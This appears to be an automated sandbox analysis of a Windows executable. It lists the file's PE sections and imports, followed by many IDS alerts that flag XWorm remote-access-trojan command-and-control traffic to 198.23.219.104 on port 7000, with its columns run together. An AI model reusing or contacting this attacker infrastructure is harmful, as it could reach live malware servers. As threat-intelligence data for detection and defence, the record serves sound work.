                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                              .text0x10000x29f000x2a000a6c3b829cc8eaabb1a474c227e90407fFalse0.5514206659226191data6.487493643901088IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rdata0x2b0000x12a500x12c004cc1506d900c0cfb7cfa0fe362be2ecdFalse0.5245442708333333data5.75279206159494IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .data0x3e0000x53f80xe00dba0caeecab624a0ccc0d577241601d1False0.134765625data1.8392217063172436IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                              .pdata0x440000x22500x2400181312260a85d10a1454ba38901c499bFalse0.4705946180555556data5.290347578351011IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .rsrc0x470000x94c0xa00a4b0f430cec4ead531c43aa605bcf450False0.430859375data5.104863129751173IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              .reloc0x480000x7640x800816c68eeb419ee2c08656c31c06a0fffFalse0.5576171875data5.2809528666624175IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                              RT_VERSION0x470a00x39cdata0.4621212121212121
                                                                                                                                                                                                                              RT_MANIFEST0x4743c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                              DLLImport
                                                                                                                                                                                                                              USER32.dllCreateWindowExW, ShutdownBlockReasonCreate, MsgWaitForMultipleObjects, ShowWindow, DestroyWindow, RegisterClassW, DefWindowProcW, PeekMessageW, DispatchMessageW, TranslateMessage, PostMessageW, GetMessageW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                              COMCTL32.dll
                                                                                                                                                                                                                              KERNEL32.dllGetACP, IsValidCodePage, GetStringTypeW, GetFileAttributesExW, SetEnvironmentVariableW, FlushFileBuffers, GetCurrentDirectoryW, LCMapStringW, CompareStringW, FlsFree, GetOEMCP, GetCPInfo, GetModuleHandleW, MulDiv, FormatMessageW, GetLastError, GetModuleFileNameW, LoadLibraryExW, SetDllDirectoryW, CreateSymbolicLinkW, GetProcAddress, GetEnvironmentStringsW, GetCommandLineW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, DeleteFileW, FindClose, FindFirstFileW, FindNextFileW, GetDriveTypeW, RemoveDirectoryW, GetTempPathW, CloseHandle, QueryPerformanceCounter, QueryPerformanceFrequency, WaitForSingleObject, Sleep, GetCurrentProcess, TerminateProcess, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LocalFree, SetConsoleCtrlHandler, K32EnumProcessModules, K32GetModuleFileNameExW, CreateFileW, FindFirstFileExW, GetFinalPathNameByHandleW, MultiByteToWideChar, WideCharToMultiByte, FlsSetValue, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, HeapReAlloc, WriteConsoleW, SetEndOfFile, CreateDirectoryW, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsProcessorFeaturePresent, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, RtlUnwindEx, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, ReadFile, GetFullPathNameW, SetStdHandle, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue
                                                                                                                                                                                                                              ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                              GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                              2024-10-13T19:01:24.479459+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:29.477991+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:34.477345+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:38.152239+02002855924ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:01:38.262957+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:38.390237+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:01:39.383490+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:39.383490+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:39.477201+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:44.477352+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:49.477446+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:53.095707+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:53.097464+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:01:54.477904+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:01:59.597150+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:04.480484+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:07.939520+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:07.940890+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:09.399936+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:09.399936+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:09.531652+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:14.476395+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:19.477476+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:22.782245+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:22.783942+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:24.475901+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:28.830663+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:28.832323+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:29.476294+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:34.476312+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:39.411926+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:39.411926+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:39.501106+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:40.922459+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:40.923936+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.012746+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.017723+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.719945+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.725337+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.830435+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:41.833112+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:44.476284+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:49.475644+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.031873+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.033371+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.124679+02002853193ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.414778+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.417035+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.514104+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.519248+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.607964+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.610876+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.613038+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:51.617084+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:02:54.475851+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:02:59.475736+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:01.578611+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:01.580014+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:04.491278+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.078619+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.082246+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.167155+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.168610+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.262861+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:07.265092+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:09.428549+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:09.428549+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:09.560616+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:14.491843+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:17.343599+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:17.348738+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:17.442659+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:17.448743+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:19.496920+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.531333+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.625393+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.670116+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.723688+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.731529+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.732441+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.775017+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.776004+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.953957+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:22.955379+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.050690+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.051992+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.181699+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.183461+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.279890+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:23.285081+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:24.510097+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:29.523241+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:30.500329+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:30.502024+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:31.557998+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:31.557998+02002853931ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:31.557998+02002853954ETPRO MALWARE Win32/XWorm V3 CnC Command - PCShutdown Inbound1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:32.875118+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:32.876891+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:34.522772+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:34.652184+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:34.653709+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:35.765177+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:35.769751+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.016178+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.020434+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.781406+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.783111+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.878311+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.879917+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.968783+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.970203+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:38.998883+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.000297+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.098223+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.099952+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.194156+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.195777+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.434283+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.434283+02002852874ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M21198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:39.571982+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:42.609049+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:42.611151+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:44.108830+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:44.115115+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:44.853754+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:44.854979+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:49.521847+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:51.484850+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
                                                                                                                                                                                                                              2024-10-13T19:03:51.490292+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.449739198.23.219.1047000TCP
                                                                                                                                                                                                                              2024-10-13T19:03:54.521956+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1198.23.219.1047000192.168.2.449739TCP
